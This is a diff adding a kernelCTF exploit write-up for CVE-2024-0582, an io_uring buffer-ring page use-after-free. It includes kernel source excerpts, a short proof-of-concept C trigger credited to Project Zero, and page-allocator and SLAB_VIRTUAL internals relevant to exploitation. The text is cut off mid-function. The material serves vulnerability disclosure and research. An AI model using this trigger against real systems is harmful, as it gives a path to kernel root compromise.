diff --git a/pocs/linux/kernelctf/CVE-2024-0582_mitigation/docs/exploit.md b/pocs/linux/kernelctf/CVE-2024-0582_mitigation/docs/exploit.md
new file mode 100644
index 00000000..519ca276
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2024-0582_mitigation/docs/exploit.md
@@ -0,0 +1,1201 @@
+## Trigger the Vulnerability
+
+The `io_uring_register` syscall supports various registration ops to allow a user to register different resources that `io_uring` can use. Specifically, with `IORING_REGISTER_PBUF_RING` combined with the `IOU_PBUF_RING_MMAP` flag, the kernel allocates pages for an `io_buffer_list` and attaches it to the `io_ring_ctx` under a given `bgid`.
+
+```c
+int io_register_pbuf_ring(struct io_ring_ctx *ctx, void __user *arg)
+{
+	struct io_uring_buf_reg reg;
+	struct io_buffer_list *bl, *free_bl = NULL;
+	int ret;
+
+	if (copy_from_user(&reg, arg, sizeof(reg)))
+		return -EFAULT;
+/*...*/
+    
+	if (!(reg.flags & IOU_PBUF_RING_MMAP))
+		ret = io_pin_pbuf_ring(&reg, bl);
+	else
+		ret = io_alloc_pbuf_ring(&reg, bl);	// <-- IOU_PBUF_RING_MMAP
+
+	if (!ret) {
+		bl->nr_entries = reg.ring_entries;
+		bl->mask = reg.ring_entries - 1;
+
+		io_buffer_add_list(ctx, bl, reg.bgid);	// <-- add buffer_list to ctx with bgid
+		return 0;
+	}
+
+	kfree(free_bl);
+	return ret;
+}
+```
+
+In the `io_alloc_pbuf_ring()` function below, the kernel uses `__get_free_pages()` to allocate pages for the buffer ring:
+
+```c
+static int io_alloc_pbuf_ring(struct io_uring_buf_reg *reg,
+			      struct io_buffer_list *bl)
+{
+	gfp_t gfp = GFP_KERNEL_ACCOUNT | __GFP_ZERO | __GFP_NOWARN | __GFP_COMP;
+	size_t ring_size;
+	void *ptr;
+
+	ring_size = reg->ring_entries * sizeof(struct io_uring_buf_ring);
+	ptr = (void *) __get_free_pages(gfp, get_order(ring_size));
+	if (!ptr)
+		return -ENOMEM;
+
+	bl->buf_ring = ptr;
+	bl->is_mapped = 1;
+	bl->is_mmap = 1;
+	return 0;
+}
+```
+
+Later, from userspace, one can request to mmap the buffer via a `vm_pgoff` that encodes both the `bgid` and `IORING_OFF_PBUF_RING`. 
+
+The internal function `io_uring_validate_mmap_request()` checks which resource is being requested ({SQ, CQ} ring, SQEs, or pbuf ring) and returns the corresponding kernel virtual address:
+
+```c
+static void *io_uring_validate_mmap_request(struct file *file,
+					    loff_t pgoff, size_t sz)
+{
+	struct io_ring_ctx *ctx = file->private_data;
+	loff_t offset = pgoff << PAGE_SHIFT;
+	struct page *page;
+	void *ptr;
+
+	if (ctx->flags & IORING_SETUP_NO_MMAP)
+		return ERR_PTR(-EINVAL);
+
+	switch (offset & IORING_OFF_MMAP_MASK) {
+	case IORING_OFF_SQ_RING:
+	case IORING_OFF_CQ_RING:
+		ptr = ctx->rings;
+		break;
+	case IORING_OFF_SQES:
+		ptr = ctx->sq_sqes;
+		break;
+	case IORING_OFF_PBUF_RING: {
+		unsigned int bgid;
+
+		bgid = (offset & ~IORING_OFF_MMAP_MASK) >> IORING_OFF_PBUF_SHIFT;
+		mutex_lock(&ctx->uring_lock);
+		ptr = io_pbuf_get_address(ctx, bgid);	// <-- get registered buffer from ctx according to bgid
+		mutex_unlock(&ctx->uring_lock);
+		if (!ptr)
+			return ERR_PTR(-EINVAL);
+		break;
+		}
+	default:
+		return ERR_PTR(-EINVAL);
+	}
+
+	page = virt_to_head_page(ptr);
+	if (sz > page_size(page))
+		return ERR_PTR(-EINVAL);
+
+	return ptr;
+}
+```
+
+The call to `io_uring_validate_mmap_request()` returns the kernel’s base address of the buffer ring. Then `io_uring_mmap()` does:
+
+```c
+static __cold int io_uring_mmap(struct file *file, struct vm_area_struct *vma)
+{
+	size_t sz = vma->vm_end - vma->vm_start;
+	unsigned long pfn;
+	void *ptr;
+
+	ptr = io_uring_validate_mmap_request(file, vma->vm_pgoff, sz);
+	if (IS_ERR(ptr))
+		return PTR_ERR(ptr);
+
+	pfn = virt_to_phys(ptr) >> PAGE_SHIFT;
+	return remap_pfn_range(vma, vma->vm_start, pfn, sz, vma->vm_page_prot);
+```
+
+A user can unregister this buffer via `IORING_UNREGISTER_PBUF_RING`. Internally, the kernel will free the pages or unpin them accordingly.
+
+```c
+int io_unregister_pbuf_ring(struct io_ring_ctx *ctx, void __user *arg)
+{
+	struct io_uring_buf_reg reg;
+	struct io_buffer_list *bl;
+
+	if (copy_from_user(&reg, arg, sizeof(reg)))
+		return -EFAULT;
+	if (reg.resv[0] || reg.resv[1] || reg.resv[2])
+		return -EINVAL;
+	if (reg.flags)
+		return -EINVAL;
+
+	bl = io_buffer_get_list(ctx, reg.bgid);	// <-- get registered buffer_list from ctx according to bgid
+	if (!bl)
+		return -ENOENT;
+	if (!bl->is_mapped)
+		return -EINVAL;
+
+	__io_remove_buffers(ctx, bl, -1U);	// <-- remove buffer
+	if (bl->bgid >= BGID_ARRAY) {
+		xa_erase(&ctx->io_bl_xa, bl->bgid);
+		kfree(bl);
+	}
+	return 0;
+}
+
+static int __io_remove_buffers(struct io_ring_ctx *ctx,
+			       struct io_buffer_list *bl, unsigned nbufs)
+{
+	unsigned i = 0;
+
+	/* shouldn't happen */
+	if (!nbufs)
+		return 0;
+
+	if (bl->is_mapped) {
+		i = bl->buf_ring->tail - bl->head;
+		if (bl->is_mmap) {
+			folio_put(virt_to_folio(bl->buf_ring));	// <-- refcount--
+			bl->buf_ring = NULL;
+			bl->is_mmap = 0;
+		} else if (bl->buf_nr_pages) {
+			int j;
+
+			for (j = 0; j < bl->buf_nr_pages; j++)
+				unpin_user_page(bl->buf_pages[j]);
+			kvfree(bl->buf_pages);
+			bl->buf_pages = NULL;
+			bl->buf_nr_pages = 0;
+		}
+		/* make sure it's seen as empty */
+		INIT_LIST_HEAD(&bl->buf_list);
+		bl->is_mapped = 0;
+		return i;
+	}
+/*...*/
+}
+```
+
+Notice the call to `folio_put(virt_to_folio(bl->buf_ring))`, which decrements the folio/page reference count.
+
+The vulnerability is that `remap_pfn_range()` is a lower-level API tha map a given physical address range into userspace creating `VM_PFNMAP` VMAs. `VM_PFNMAP` mappings are special, because unlike normal memory mappings, there is no lifetime information associated with the mapping - it is just a raw mapping of PFNs with no reference counting of a 'struct page';  therefore, the caller is responsible for holding references to the page as long as it is mapped into userspace.
+
+```c
+static __cold int io_uring_mmap(struct file *file, struct vm_area_struct *vma)
+{
+	size_t sz = vma->vm_end - vma->vm_start;
+	unsigned long pfn;
+	void *ptr;
+
+	ptr = io_uring_validate_mmap_request(file, vma->vm_pgoff, sz);
+	if (IS_ERR(ptr))
+		return PTR_ERR(ptr);
+
+	pfn = virt_to_phys(ptr) >> PAGE_SHIFT;
+	return remap_pfn_range(vma, vma->vm_start, pfn, sz, vma->vm_page_prot);
+```
+
+So if a user registers a buffer ring with `IORING_REGISTER_PBUF_RING`, `mmap()` it, and then frees it with `IORING_UNREGISTER_PBUF_RING`, the user will gain the ability to read or write already freed pages, it's a well-known universal root primitive.
+
+A poc taken from [Linux >=6.4: io_uring: page UAF via buffer ring mmap - Project Zero](https://project-zero.issues.chromium.org/issues/42451653):
+
+```c
+#define _GNU_SOURCE
+#include <err.h>
+#include <linux/io_uring.h>
+#include <stdio.h>
+#include <string.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <unistd.h>
+
+#define SYSCHK(x) ({ \
+typeof(x) __res = (x); \
+if (__res == (typeof(x))-1) \
+err(1, "SYSCHK(" #x ")"); \
+__res; \
+})
+
+int main(void) {
+  struct io_uring_params params = {.flags = IORING_SETUP_NO_SQARRAY};
+  int uring_fd = SYSCHK(syscall(__NR_io_uring_setup, /*entries=*/40, &params));
+  printf("uring_fd = %d\n", uring_fd);
+
+  struct io_uring_buf_reg reg = {
+      .ring_entries = 1, .bgid = 0, .flags = IOU_PBUF_RING_MMAP};
+  SYSCHK(syscall(__NR_io_uring_register, uring_fd, IORING_REGISTER_PBUF_RING,
+                 &reg, 1));
+
+  void *pbuf_mapping = SYSCHK(mmap(NULL, 0x1000, PROT_READ | PROT_WRITE,
+                                   MAP_SHARED, uring_fd, IORING_OFF_PBUF_RING));
+  printf("pbuf mapped at %p\n", pbuf_mapping);
+
+  struct io_uring_buf_reg unreg = {.bgid = 0};
+  SYSCHK(syscall(__NR_io_uring_register, uring_fd, IORING_UNREGISTER_PBUF_RING,
+                 &unreg, 1));
+  while (1) {
+    memset(pbuf_mapping, 0xaa, 0x1000);
+    usleep(100000);
+  }
+}
+```
+
+## Revisit of Page UAF
+
+Since page UAF is a very powerful primitive, exploit is quite easy and straightforward.  Before we go ahead into the trivial exploit part, let's revisit how page UAF works, especially on kernelCTF's hardened mitigation instance.
+
+### PCP(per_cpu_pages) list & migratetype
+
+#### folio_put
+
+If a folio's reference count drops to zero, the memory will be released back to the page allocator and may be used by another allocation immediately.
+
+``` c
+static inline void folio_put(struct folio *folio)
+{
+	if (folio_put_testzero(folio))
+		__folio_put(folio);
+}
+
+void __folio_put(struct folio *folio)
+{
+	if (unlikely(folio_is_zone_device(folio)))
+		free_zone_device_page(&folio->page);
+	else if (unlikely(folio_test_large(folio)))	// <-- multi-page folio?
+		__folio_put_large(folio);
+	else
+		__folio_put_small(folio);
+}
+```
+
+Normally, depending on the folio type, the call flows into either the single-page or multi-page release path:
+
+```c
+// 👇 single page release path
+static void __folio_put_small(struct folio *folio)
+{
+	__page_cache_release(folio);
+	mem_cgroup_uncharge(folio);
+	free_unref_page(&folio->page, 0);	// <-- try free via pcp
+}
+
+// 👇 multiple page release path
+static void __folio_put_large(struct folio *folio)
+{
+	if (!folio_test_hugetlb(folio))
+		__page_cache_release(folio);
+	destroy_large_folio(folio);
+}
+
+void destroy_large_folio(struct folio *folio)
+{
+	if (folio_test_hugetlb(folio)) {
+		free_huge_folio(folio);
+		return;
+	}
+
+	if (folio_test_large_rmappable(folio))
+		folio_undo_large_rmappable(folio);
+
+	mem_cgroup_uncharge(folio);
+	free_the_page(&folio->page, folio_order(folio));
+}
+```
+
+The function `free_the_page()` decides whether to place the pages into the PCP list or release them directly to the buddy allocator:
+
+```c
+#define PAGE_ALLOC_COSTLY_ORDER 3
+
+static inline bool pcp_allowed_order(unsigned int order)
+{
+	if (order <= PAGE_ALLOC_COSTLY_ORDER)
+		return true;
+#ifdef CONFIG_TRANSPARENT_HUGEPAGE
+	if (order == pageblock_order)
+		return true;
+#endif
+	return false;
+}
+
+static inline void free_the_page(struct page *page, unsigned int order)
+{
+	if (pcp_allowed_order(order))		/* Via pcp? */
+		free_unref_page(page, order);
+	else
+		__free_pages_ok(page, order, FPI_NONE);
+}
+```
+
+If the released pages meet all of these conditions:
+
+- `migratetype < MIGRATE_PCPTYPES`
+- `order <= PAGE_ALLOC_COSTLY_ORDER`
+-  `pcp->count` is below the `high` watermark
+
+then they are added to the `pcp->lists[pindex]`(where `pindex` is calculated through `order` and `migratetype`) rather than immediately being returned to the buddy allocator. 
+
+This logic is handled in `free_unref_page()` and `free_unref_page_commit()`:
+
+```c
+/*
+ * Free a pcp page
+ */
+void free_unref_page(struct page *page, unsigned int order)
+{
+	unsigned long __maybe_unused UP_flags;
+	struct per_cpu_pages *pcp;
+	struct zone *zone;
+	unsigned long pfn = page_to_pfn(page);
+	int migratetype, pcpmigratetype;
+
+	if (!free_unref_page_prepare(page, pfn, order))
+		return;
+
+	migratetype = pcpmigratetype = get_pcppage_migratetype(page);
+	if (unlikely(migratetype >= MIGRATE_PCPTYPES)) {
+		if (unlikely(is_migrate_isolate(migratetype))) {
+			free_one_page(page_zone(page), page, pfn, order, migratetype, FPI_NONE);
+			return;
+		}
+		pcpmigratetype = MIGRATE_MOVABLE;
+	}
+
+	zone = page_zone(page);
+	pcp_trylock_prepare(UP_flags);
+	pcp = pcp_spin_trylock(zone->per_cpu_pageset);
+	if (pcp) {
+		free_unref_page_commit(zone, pcp, page, pcpmigratetype, order);
+		pcp_spin_unlock(pcp);
+	} else {
+		free_one_page(zone, page, pfn, order, migratetype, FPI_NONE);
+	}
+	pcp_trylock_finish(UP_flags);
+}
+
+static inline unsigned int order_to_pindex(int migratetype, int order)
+{
+/*...*/
+    return (MIGRATE_PCPTYPES * order) + migratetype;
+}
+
+static void free_unref_page_commit(struct zone *zone, struct per_cpu_pages *pcp,
+				   struct page *page, int migratetype,
+				   unsigned int order)
+{
+	int high;
+	int pindex;
+	bool free_high;
+
+	__count_vm_events(PGFREE, 1 << order);
+	pindex = order_to_pindex(migratetype, order);
+    // 👇 add to the pcp list
+	list_add(&page->pcp_list, &pcp->lists[pindex]);
+	pcp->count += 1 << order;
+
+	free_high = (pcp->free_factor && order && order <= PAGE_ALLOC_COSTLY_ORDER);
+
+	high = nr_pcp_high(pcp, zone, free_high);
+	if (pcp->count >= high) {
+		free_pcppages_bulk(zone, nr_pcp_free(pcp, high, free_high), pcp, pindex);
+	}
+}
+```
+
+#### __alloc_pages
+
+When the kernel needs new pages, it calls `__alloc_pages()`, which then calls `get_page_from_freelist()`. Internally, the allocation logic tries to grab pages from the PCP list first (via `rmqueue_pcplist()`):
+
+```c
+/*
+ * This is the 'heart' of the zoned buddy allocator.
+ */
+struct page *__alloc_pages(gfp_t gfp, unsigned int order, int preferred_nid,
+							nodemask_t *nodemask)
+{
+/*...*/
+	/* First allocation attempt */
+	page = get_page_from_freelist(alloc_gfp, order, alloc_flags, &ac);
+	if (likely(page))
+		goto out;
+
+/*...*/
+    return page;
+}
+
+
+```
+
+Inside `get_page_from_freelist()` and `rmqueue()`:
+
+```c
+/*
+ * get_page_from_freelist goes through the zonelist trying to allocate
+ * a page.
+ */
+static struct page *
+get_page_from_freelist(gfp_t gfp_mask, unsigned int order, int alloc_flags,
+						const struct alloc_context *ac)
+{
+	struct zoneref *z;
+	struct zone *zone;
+	struct pglist_data *last_pgdat = NULL;
+	bool last_pgdat_dirty_ok = false;
+	bool no_fallback;
+
+/*...*/
+
+try_this_zone:
+		page = rmqueue(ac->preferred_zoneref->zone, zone, order,
+				gfp_mask, alloc_flags, ac->migratetype);
+		if (page) {
+			prep_new_page(page, order, gfp_mask, alloc_flags);
+			if (unlikely(alloc_flags & ALLOC_HIGHATOMIC))
+				reserve_highatomic_pageblock(page, zone);
+			return page;
+		} 
+/*...*/
+
+	return NULL;
+}
+
+__no_sanitize_memory
+static inline
+struct page *rmqueue(struct zone *preferred_zone,
+			struct zone *zone, unsigned int order,
+			gfp_t gfp_flags, unsigned int alloc_flags,
+			int migratetype)
+{
+	struct page *page;
+
+	WARN_ON_ONCE((gfp_flags & __GFP_NOFAIL) && (order > 1));
+
+	if (likely(pcp_allowed_order(order))) {	//	<-- order <= PAGE_ALLOC_COSTLY_ORDER
+		page = rmqueue_pcplist(preferred_zone, zone, order,
+				       migratetype, alloc_flags);
+		if (likely(page))
+			goto out;
+	}
+
+/*...*/
+    
+	VM_BUG_ON_PAGE(page && bad_range(zone, page), page);
+	return page;
+}
+```
+
+The routine `rmqueue_pcplist()` attempts to remove pages from the relevant PCP list (matching `order` and `migratetype`), and return them immediately. If it cannot find suitable pages, it falls back to the buddy free list.
+
+```c
+/* Lock and remove page from the per-cpu list */
+static struct page *rmqueue_pcplist(struct zone *preferred_zone,
+			struct zone *zone, unsigned int order,
+			int migratetype, unsigned int alloc_flags)
+{
+	struct per_cpu_pages *pcp;
+	struct list_head *list;
+	struct page *page;
+	unsigned long __maybe_unused UP_flags;
+
+	/* spin_trylock may fail due to a parallel drain or IRQ reentrancy. */
+	pcp_trylock_prepare(UP_flags);
+	pcp = pcp_spin_trylock(zone->per_cpu_pageset);
+	if (!pcp) {
+		pcp_trylock_finish(UP_flags);
+		return NULL;
+	}
+
+	pcp->free_factor >>= 1;
+	list = &pcp->lists[order_to_pindex(migratetype, order)];
+	page = __rmqueue_pcplist(zone, order, migratetype, alloc_flags, pcp, list);
+	pcp_spin_unlock(pcp);
+	pcp_trylock_finish(UP_flags);
+	if (page) {
+		__count_zid_vm_events(PGALLOC, page_zonenum(page), 1 << order);
+		zone_statistics(preferred_zone, zone, 1);
+	}
+	return page;
+}
+```
+
+### Notes on SLAB_VIRTUAL
+
+The document of `SLAB_VIRTUAL` can be checked at [self-protection.rst](https://github.com/thejh/linux/blob/slub-virtual-v6.6/Documentation/security/self-protection.rst). 
+
+The `SLAB_VIRTUAL` mitigation focuses on preventing slab virtual address reuse by reserving a region of virtual memory for the slab allocator. And when `SLAB_VIRTUAL` is enabled, the slab's lifetime is not associated with slab pages anymore.
+
+#### `SLAB_VIRTUAL` disabled:
+
+##### allocate_slab
+
+Inside `alloc_slab_page()`: When we try to allocate a new slab, we are actually trying to get pages from buddy allocator, and later we call these pages we got `slab`. 
+
+```c
+static inline struct slab *alloc_slab_page(struct kmem_cache *s,
+		gfp_t meta_flags, gfp_t flags, int node,
+		struct kmem_cache_order_objects oo)
+{
+	struct folio *folio;
+	struct slab *slab;
+	unsigned int order;
+
+	if (slab_virtual_enabled())	// <-- disabled now
+		return alloc_slab_page_virtual(s, meta_flags, flags, node, oo);
+	// <-- We enter the code below 
+	order = oo_order(oo);
+
+	if (node == NUMA_NO_NODE)
+		folio = (struct folio *)alloc_pages(flags, order);
+	else
+		folio = (struct folio *)__alloc_pages_node(node, flags, order);
+
+	if (!folio)
+		return NULL;
+
+	slab = folio_slab(folio);
+	folio_set_slab(folio, slab);
+
+	return slab;
+}
+```
+
+As the comment against `folio_slab` says: struct slab is a different representation of a `folio` (A `folio` is a way of representing a set of physically contiguous base pages).
+
+```c
+/**
+ * folio_slab - Converts from folio to slab.
+ * @folio: The folio.
+ *
+ * Currently struct slab is a different representation of a folio where
+ * folio_test_slab() is true.
+ *
+ * Return: The slab which contains this folio.
+ */
+#define folio_slab(folio)	(_Generic((folio),			\
+	const struct folio *:	(const struct slab *)(folio),		\
+	struct folio *:		(struct slab *)(folio)))
+
+/**
+ * slab_folio - The folio allocated for a slab
+ * @slab: The slab.
+ *
+ * Slabs are allocated as folios that contain the individual objects and are
+ * using some fields in the first struct page of the folio - those fields are
+ * now accessed by struct slab. It is occasionally necessary to convert back to
+ * a folio in order to communicate with the rest of the mm.  Please use this
+ * helper function instead of casting yourself, as the implementation may change
+ * in the future.
+ */
+#define slab_folio(s)		(_Generic((s),				\
+	const struct slab *:	(slab_virtual_enabled() ? s->backing_folio : (const struct folio *)s),		\
+	struct slab *:		(slab_virtual_enabled() ? s->backing_folio : (struct folio *)s)))
+```
+
+##### free_slab
+
+When a slab is going to be freed inside `__free_slab`:
+
+```c
+static void __free_slab(struct kmem_cache *s, struct slab *slab)
+{
+	struct folio *folio;
+	int order;
+	int pages;
+
+	if (slab_virtual_enabled()) {	// <-- disabled now
+		__free_slab_virtual(s, (struct virtual_slab *)slab);
+		return;
+	}
+
+	folio = slab_folio(slab);
+	order = folio_order(folio);
+	pages = 1 << order;
+
+	folio_clear_slab(folio, slab);
+	mm_account_reclaimed_pages(pages);
+	unaccount_slab(slab, order, s);
+	__free_pages(&folio->page, order);
+}
+```
+
+The slab's pages will also be freed and returned to buddy allocator. 
+
+And if a attacker managed to return the slab to buddy allocator and allocate them back as a new slab(whose belonging `kmem_cache` can be different from previous one), the attacker managed to perform a `cross-cache` attack.
+
+#### `SLAB_VIRTUAL` enabled:
+
+##### allocate_slab
+
+Everything changes when `SLAB_VIRTUAL` is enabled:
+
+```c
+static inline struct slab *alloc_slab_page(struct kmem_cache *s,
+		gfp_t meta_flags, gfp_t flags, int node,
+		struct kmem_cache_order_objects oo)
+{
+	struct folio *folio;
+	struct slab *slab;
+	unsigned int order;
+
+	if (slab_virtual_enabled())	// <-- enabled now
+        // 👇 We directly return here
+		return alloc_slab_page_virtual(s, meta_flags, flags, node, oo);
+	/*...*/
+}
+```
+
+The `slab` (which actually we should call it `virtual_slab` now) is not simply a equality of `folio` anymore. When the kernel try to allocate a new `virtual_slab`, the `virtual_slab` will be located on `SLUB virtual memory` instead of `virtual memory map (vmemmap_base)`. And the `virtual_slab` is now consist of two parts --- `meta` and `data`. The `alloc_slab_meta()` function reserve a range of virtual address space for both of them:
+
+```c
+/*
+ * Reserve a range of virtual address space, ensure that we have page tables for
+ * it, and allocate a corresponding struct slab.
+ * This is cold code, we don't really have to worry about performance here.
+ */
+static struct virtual_slab *alloc_slab_meta(unsigned int order, gfp_t gfp_flags)
+{
+	unsigned long alloc_size = PAGE_SIZE << order;
+	unsigned long flags;
+	unsigned long old_base;
+	unsigned long data_range_start, data_range_end;
+	unsigned long meta_range_start, meta_range_end;
+	unsigned long addr;
+	struct virtual_slab *slab, *sp;
+	bool valid_start, valid_end;
+
+	gfp_flags &= (__GFP_HIGH | __GFP_RECLAIM | __GFP_IO |
+		      __GFP_FS | __GFP_NOWARN | __GFP_RETRY_MAYFAIL |
+		      __GFP_NOFAIL | __GFP_NORETRY | __GFP_MEMALLOC |
+		      __GFP_NOMEMALLOC);
+	/* New page tables and metadata pages should be zeroed */
+	gfp_flags |= __GFP_ZERO;
+
+	slub_valloc_lock(flags);
+retry_locked:
+	old_base = slub_addr_current;
+
+	/*
+	 * We drop the lock. The following code might sleep during
+	 * page table allocation. Any mutations we make before rechecking
+	 * slub_addr_current are idempotent, so that's fine.
+	 */
+	slub_valloc_unlock(flags);
+
+	/*
+	 * [data_range_start, data_range_end) is the virtual address range where
+	 * this slab's objects will be mapped.
+	 * We want alignment appropriate for the order. Note that this could be
+	 * relaxed based on the alignment requirements of the objects being
+	 * allocated, but for now, we behave like the page allocator would.
+	 */
+	data_range_start = ALIGN(old_base + slub_virtual_guard_size, alloc_size);
+	data_range_end = data_range_start + alloc_size;
+
+	valid_start = data_range_start >= SLAB_DATA_BASE_ADDR &&
+		IS_ALIGNED(data_range_start, PAGE_SIZE);
+	valid_end = data_range_end >= SLAB_DATA_BASE_ADDR &&
+		IS_ALIGNED(data_range_end, PAGE_SIZE);
+	if (CHECK_DATA_CORRUPTION(!valid_start,
+			"invalid slab data range start") ||
+		CHECK_DATA_CORRUPTION(!valid_end,
+			"invalid slab data range end"))
+		return NULL;
+
+	/* We ran out of virtual memory for slabs */
+	if (WARN_ON_ONCE(data_range_start >= SLAB_END_ADDR ||
+		data_range_end >= SLAB_END_ADDR))
+		return NULL;
+
+	/*
+	 * [meta_range_start, meta_range_end) is the range where the struct
+	 * slabs for the current data range are mapped. The first struct slab,
+	 * located at meta_range_start is the head slab that contains the actual
+	 * data, all other struct slabs in the range point to the head slab.
+	 */
+	meta_range_start = virt_to_slab_virtual_raw(data_range_start);
+	meta_range_end = virt_to_slab_virtual_raw(data_range_end);
+
+	/* Ensure the meta range is mapped. */
+	for (addr = ALIGN_DOWN(meta_range_start, PAGE_SIZE);
+	     addr < meta_range_end; addr += PAGE_SIZE) {
+		pte_t *ptep = slub_get_ptep(addr, gfp_flags, true);
+
+		if (ptep == NULL)
+			return NULL;
+
+		slub_valloc_lock(flags);
+		if (pte_none(READ_ONCE(*ptep))) {
+			struct page *meta_page;
+
+			slub_valloc_unlock(flags);
+			meta_page = alloc_page(gfp_flags);
+			if (meta_page == NULL)
+				return NULL;
+			slub_valloc_lock(flags);
+
+			/* Make sure that no one else has already mapped that page */
+			if (pte_none(READ_ONCE(*ptep)))
+				set_pte_safe(ptep,
+					mk_pte(meta_page, PAGE_KERNEL));
+			else
+				__free_page(meta_page);
+		}
+		slub_valloc_unlock(flags);
+	}
+
+	/* Ensure we have page tables for the data range. */
+	for (addr = data_range_start; addr < data_range_end;
+		addr += PAGE_SIZE) {
+		pte_t *ptep = slub_get_ptep(addr, gfp_flags, true);
+
+		if (ptep == NULL)
+			return NULL;
+	}
+
+	/* Did we race with someone else who made forward progress? */
+	slub_valloc_lock(flags);
+	if (old_base != slub_addr_current)
+		goto retry_locked;
+
+	/* Success! Grab the range for ourselves. */
+	slub_addr_current = data_range_end;
+	slub_valloc_unlock(flags);
+
+	slab = (struct virtual_slab *)meta_range_start;
+	spin_lock_init(&slab->slab.slab_lock);
+
+	/* Initialize basic slub metadata for virt_to_slab() */
+	for (sp = slab; (unsigned long)sp < meta_range_end; sp++)
+		sp->compound_slab_head = slab;
+
+	return slab;
+}
+
+static struct virtual_slab *get_free_slab(struct kmem_cache *s,
+	struct kmem_cache_order_objects oo, gfp_t meta_gfp_flags,
+	struct list_head *freed_slabs)
+{
+	unsigned long flags;
+	struct virtual_slab *slab;
+
+/*...*/
+	spin_unlock_irqrestore(&s->virtual.freed_slabs_lock, flags);
+	slab = alloc_slab_meta(oo_order(oo), meta_gfp_flags);
+	if (slab == NULL)
+		return NULL;
+/*...*/
+	return slab;
+}
+```
+
+After the kernel gets the `virtual_slab`, it will get pages from buddy allocator, but this time these pages are used as so-called `backing_folio` of  `virtual_slab`.
+
+```c
+static inline void folio_set_slab(struct folio *folio, struct slab *slab)
+{
+	__folio_set_slab(folio);
+	/* Make the flag visible before any changes to folio->mapping */
+	smp_wmb();
+
+	if (slab_virtual_enabled())
+		slab->backing_folio = folio;
+
+	if (folio_is_pfmemalloc(folio))
+		slab_set_pfmemalloc(slab);
+}
+
+static struct slab *alloc_slab_page_virtual(struct kmem_cache *s,
+		gfp_t meta_gfp_flags, gfp_t gfp_flags, int node,
+		struct kmem_cache_order_objects oo)
+{
+	struct folio *folio;
+	struct virtual_slab *slab;
+	unsigned int order = oo_order(oo);
+	unsigned long flags;
+	void *virt_mapping;
+	pte_t *ptep;
+	struct list_head *freed_slabs;
+
+	if (order == oo_order(s->min))
+		freed_slabs = &s->virtual.freed_slabs_min;
+	else
+		freed_slabs = &s->virtual.freed_slabs;
+
+	slab = get_free_slab(s, oo, meta_gfp_flags, freed_slabs);
+	if (!slab)
+		return NULL;
+
+	/*
+	 * Avoid making UAF reads easily exploitable by repopulating
+	 * with pages containing attacker-controller data - always zero
+	 * pages.
+	 */
+	gfp_flags |= __GFP_ZERO;
+	if (node == NUMA_NO_NODE)
+		folio = (struct folio *)alloc_pages(gfp_flags, order);
+	else
+		folio = (struct folio *)__alloc_pages_node(node, gfp_flags,
+			order);
+
+	if (!folio) {
+		/* Rollback: put the struct slab back. */
+		spin_lock_irqsave(&s->virtual.freed_slabs_lock, flags);
+		list_add(&slab->slab.slab_list, freed_slabs);
+		WRITE_ONCE(s->virtual.nr_freed_pages,
+			s->virtual.nr_freed_pages + (1UL << slab_order(&slab->slab)));
+		spin_unlock_irqrestore(&s->virtual.freed_slabs_lock, flags);
+
+		return NULL;
+	}
+	folio_set_slab(folio, (struct slab *)slab);
+
+	slab->slab.oo = oo;
+
+	virt_mapping = slab_to_virt(slab);
+
+	/* Wire up physical folio */
+	for (unsigned long i = 0; i < (1UL << oo_order(oo)); i++) {
+		ptep = slub_get_ptep(
+			(unsigned long)virt_mapping + i * PAGE_SIZE, 0, false);
+		if (CHECK_DATA_CORRUPTION(pte_present(*ptep),
+			"slab PTE already present"))
+			return NULL;
+		set_pte_safe(ptep, mk_pte(folio_page(folio, i), PAGE_KERNEL));
+	}
+
+	return (struct slab *)slab;
+}
+```
+
+And the kernel set up ptes between `virt_mapping`(`data` of a `virtual_slab`) and physical pages of the `backing_folio` before completing the allocation.
+
+##### free_slab
+
+When `SLAB_VIRTUAL` is enabled and the kernel is going to free a `virtual_slab`, the `virtual_slab` won't be returned back to buddy allocator now.(after all it's not allocated from buddy allocator anymore : >)
+
+```c
+static void __free_slab(struct kmem_cache *s, struct slab *slab)
+{
+	struct folio *folio;
+	int order;
+	int pages;
+
+	if (slab_virtual_enabled()) {	// <-- enabled now
+		__free_slab_virtual(s, (struct virtual_slab *)slab);
+        // 👇 return directly here
+		return;
+	}
+
+	/*...*/
+}
+```
+
+Instead the kernel clears the ptes between `virt_mapping` and physical pages of the  `backing_folio`:
+
+```c
+static void __free_slab_virtual(struct kmem_cache *s, struct virtual_slab *slab)
+{
+	int order = oo_order(slab->slab.oo);
+	unsigned long pages = 1UL << order;
+	unsigned long slab_base = (unsigned long)slab_address(&slab->slab);
+
+	/* Clear the PTEs for the slab we're freeing */
+	for (unsigned long i = 0; i < pages; i++) {
+		unsigned long addr = slab_base + i * PAGE_SIZE;
+		pte_t *ptep = slub_get_ptep(addr, 0, false);
+
+		if (CHECK_DATA_CORRUPTION(!pte_present(*ptep),
+			"slab PTE already clear"))
+			return;
+
+		ptep_clear(&init_mm, addr, ptep);
+	}
+
+	mm_account_reclaimed_pages(pages);
+	unaccount_slab(&slab->slab, order, s);
+
+	/*
+	 * We might not be able to a TLB flush here (e.g. hardware interrupt
+	 * handlers) so instead we give the slab to the TLB flusher thread
+	 * which will flush the TLB for us and only then free the physical
+	 * memory.
+	 */
+	queue_slab_tlb_flush(slab);
+}
+```
+
+Later the kernel submit the `virtual_slab` to `slub_tlbflush_worker`, return the physical pages of the `backing_folio` to buddy allocator after flushing the TLB:
+
+```c
+static void slub_tlbflush_worker(struct kthread_work *work)
+{
+	unsigned long irq_flags;
+	LIST_HEAD(local_queue);
+	struct virtual_slab *slab, *tmp;
+	unsigned long addr_start = ULONG_MAX;
+	unsigned long addr_end = 0;
+
+	spin_lock_irqsave(&slub_kworker_lock, irq_flags);
+	list_splice_init(&slub_tlbflush_queue, &local_queue);
+	list_for_each_entry(slab, &local_queue, slab.slab_list) {
+		unsigned long start = (unsigned long)slab_to_virt(slab);
+		unsigned long end = start + PAGE_SIZE *
+			(1UL << oo_order(slab->slab.oo));
+
+		if (start < addr_start)
+			addr_start = start;
+		if (end > addr_end)
+			addr_end = end;
+	}
+	spin_unlock_irqrestore(&slub_kworker_lock, irq_flags);
+
+	if (addr_start < addr_end)
+		flush_tlb_kernel_range(addr_start, addr_end);
+
+	spin_lock_irqsave(&slub_kworker_lock, irq_flags);
